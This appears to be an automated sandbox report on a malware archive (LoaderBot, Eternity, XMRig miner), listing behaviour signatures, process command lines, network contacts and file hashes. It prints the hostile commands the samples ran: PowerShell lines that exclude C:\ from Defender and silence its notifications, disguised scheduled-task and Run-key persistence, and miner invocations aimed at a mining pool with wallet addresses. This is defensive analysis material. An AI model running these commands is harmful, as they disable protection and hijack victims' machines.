Analysis Overview
SHA256
9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9
Threat Level: Known bad
The file 7858706412.zip was found to be: Known bad.
Malicious Activity Summary
LoaderBot executable
xmrig
Loaderbot family
Modifies security service
Eternity family
LoaderBot
Modifies Windows Defender Real-time Protection settings
Eternity
LoaderBot executable
XMRig Miner payload
Sets file to hidden
Executes dropped EXE
UPX packed file
Checks computer location settings
Drops startup file
Loads dropped DLL
Deletes itself
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Runs ping.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: RenamesItself
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Views/modifies file attributes
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-07 13:02
Signatures
Eternity family
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loaderbot family
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220812-en
Max time kernel
99s
Max time network
140s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4636 set thread context of 5052 | N/A | C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe | C:\Windows\System32\svchost.exe |
| PID 1292 set thread context of 2624 | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | C:\Windows\System32\svchost.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==
Network
| Country | Destination | Domain | Proto |
| RU | 31.41.244.231:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| DE | 20.52.64.200:443 | tcp | |
| RU | 31.41.244.231:80 | tcp |
Files
memory/2012-132-0x0000000000000000-mapping.dmp
memory/4636-133-0x0000000000DF0000-0x000000000143F000-memory.dmp
memory/5052-135-0x00007FF63A32C6E0-mapping.dmp
memory/5052-134-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp
memory/5052-140-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp
memory/5052-145-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp
memory/4636-146-0x0000000000DF0000-0x000000000143F000-memory.dmp
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/4292-149-0x0000000000FE0000-0x000000000162F000-memory.dmp
memory/4636-150-0x0000000000DF0000-0x000000000143F000-memory.dmp
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1292-152-0x0000000000FE0000-0x000000000162F000-memory.dmp
memory/2624-154-0x00007FF63A32C6E0-mapping.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
152s
Max time network
141s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1892 set thread context of 1708 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-MpPreference -PUAProtection 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath C:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
Files
memory/900-54-0x000007FEFC3B1000-0x000007FEFC3B3000-memory.dmp
\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
memory/1892-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
memory/1892-59-0x0000000001380000-0x000000000192E000-memory.dmp
memory/1472-60-0x0000000000000000-mapping.dmp
memory/612-62-0x0000000000000000-mapping.dmp
memory/1384-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | ac590245904e4b02a2a0f76fee439591 |
| SHA1 | e89492ba719a7d0b55d1777d103c98a6050eb571 |
| SHA256 | f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19 |
| SHA512 | 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | ac590245904e4b02a2a0f76fee439591 |
| SHA1 | e89492ba719a7d0b55d1777d103c98a6050eb571 |
| SHA256 | f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19 |
| SHA512 | 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863 |
memory/2008-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | ac590245904e4b02a2a0f76fee439591 |
| SHA1 | e89492ba719a7d0b55d1777d103c98a6050eb571 |
| SHA256 | f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19 |
| SHA512 | 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863 |
memory/612-68-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp
memory/1384-70-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp
memory/2008-74-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp
memory/1472-78-0x0000000002964000-0x0000000002967000-memory.dmp
memory/2008-79-0x0000000002714000-0x0000000002717000-memory.dmp
memory/1384-80-0x00000000029B4000-0x00000000029B7000-memory.dmp
memory/612-81-0x0000000002504000-0x0000000002507000-memory.dmp
memory/1472-75-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp
memory/2008-76-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp
memory/1384-77-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp
memory/612-82-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp
memory/612-86-0x000000001B740000-0x000000001BA3F000-memory.dmp
memory/1384-84-0x000000001B760000-0x000000001BA5F000-memory.dmp
memory/1472-85-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
memory/2008-83-0x000000001B720000-0x000000001BA1F000-memory.dmp
memory/2008-89-0x0000000002714000-0x0000000002717000-memory.dmp
memory/1472-92-0x0000000002964000-0x0000000002967000-memory.dmp
memory/2008-91-0x000000000271B000-0x000000000273A000-memory.dmp
memory/1384-90-0x00000000029B4000-0x00000000029B7000-memory.dmp
memory/1472-88-0x000000000296B000-0x000000000298A000-memory.dmp
memory/1472-87-0x0000000002964000-0x0000000002967000-memory.dmp
memory/1384-94-0x00000000029B4000-0x00000000029B7000-memory.dmp
memory/612-93-0x0000000002504000-0x0000000002507000-memory.dmp
memory/612-96-0x000000000250B000-0x000000000252A000-memory.dmp
memory/1384-95-0x00000000029BB000-0x00000000029DA000-memory.dmp
memory/612-97-0x0000000002504000-0x0000000002507000-memory.dmp
memory/612-98-0x000000000250B000-0x000000000252A000-memory.dmp
memory/1892-99-0x0000000000950000-0x00000000009C8000-memory.dmp
memory/1708-100-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-101-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-103-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-106-0x000000014070A480-mapping.dmp
memory/1708-105-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-107-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-108-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-109-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-111-0x00000000000F0000-0x0000000000104000-memory.dmp
memory/1708-110-0x0000000140000000-0x0000000140711000-memory.dmp
memory/1708-112-0x0000000000000000-0x0000000001000000-memory.dmp
memory/1708-113-0x0000000140000000-0x0000000140711000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe" | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4768 wrote to memory of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
| PID 4768 wrote to memory of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
| PID 4768 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
| PID 4768 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 1796 -ip 1796
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1796 -s 760
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.13.62:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| US | 204.79.197.200:443 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 8.238.21.126:80 | tcp | |
| US | 20.42.65.90:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp |
Files
memory/4768-132-0x0000000000700000-0x0000000000AFE000-memory.dmp
memory/4768-133-0x0000000005740000-0x00000000057A6000-memory.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1796-134-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1796-137-0x00000000001D0000-0x00000000001E4000-memory.dmp
memory/1796-138-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1796-139-0x0000000140000000-0x0000000140B75000-memory.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1232-140-0x0000000000000000-mapping.dmp
memory/1232-143-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1232-144-0x00000000005D0000-0x00000000005F0000-memory.dmp
memory/1232-145-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1232-146-0x00000000020B0000-0x00000000020D0000-memory.dmp
memory/1232-147-0x00000000020B0000-0x00000000020D0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
